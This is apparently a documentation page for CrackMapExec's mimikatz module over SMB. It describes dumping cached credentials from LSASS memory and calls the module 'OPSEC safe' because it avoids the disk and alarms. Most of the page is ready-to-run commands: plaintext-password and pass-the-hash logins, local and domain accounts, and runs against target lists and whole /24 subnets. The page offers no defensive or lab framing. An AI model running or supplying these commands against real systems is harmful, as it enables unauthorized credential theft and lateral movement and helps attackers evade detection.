CrackMapExec Mimikatz (smb)


This page contains detailed information about how to use the mimikatz CME module while using the smb protocol. For list of all CrackMapExec modules, visit the CrackMapExec Module Library.

Description


This module executes PowerSploit's Invoke-Mimikatz.ps1 script (Mimikatz's DPAPI Module) and extract cached credentials from memory from the LSASS subsystem. In essence, it executes privilege::debug and sekurlsa::logonpasswords Mimikatz commands.

The mimikatz module is OPSEC safe. This means that it doesn't touch the disk and therefore shouldn't trigger any alarms.

Supported Protocols


  • mssql
  • smb

Module Source Code


Authors


Module Options


As you can see below, the mimikatz module has one option:

# cme smb -M mimikatz --options
[*] mimikatz module options:

           COMMAND  Mimikatz command to execute (default: 'sekurlsa::logonpasswords')

Note that this option is not required. If you want to change the default value, you can do so by appending -o COMMAND=VALUE parameter to the command line.

Module Usage


This is how to use the mimikatz module while using the smb protocol:

Syntax:
# cme smb <TARGET[s]> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M mimikatz

Local admin:
# cme smb 10.0.5.1 -u Administrator -p P@ss123 -d . -M mimikatz
# cme smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M mimikatz

Domain user:
# cme smb 10.0.5.1 -u bkpadmin -p P@ss123 -d target.corp -M mimikatz

CrackMapExec also supports passing the hash, so you can specify NTLM hash instead of a password:

# cme smb 10.0.5.1 -u Administrator -H 432b022dc22aa5afe884e986b8383ff2 -d . -M mimikatz
# cme smb 10.0.5.1 -u bkpadmin -H 432b022dc22aa5afe884e986b8383ff2 -d target.corp -M mimikatz
The mimikatz module can be also used against multiple hosts. Here's how to run it against multiple hosts:

# cme smb target_list.txt -u Administrator -p P@ss123 -d . -M mimikatz
# cme smb 10.0.5.0/24 -u Administrator -p P@ss123 -d . -M mimikatz
# cme smb 10.0.5.1-100 -u Administrator -p P@ss123 -d . -M mimikatz

References


Version


This page has been created based on CrackMapExec version 5.1.7dev.
Visit CrackMapExec Module Library for more modules.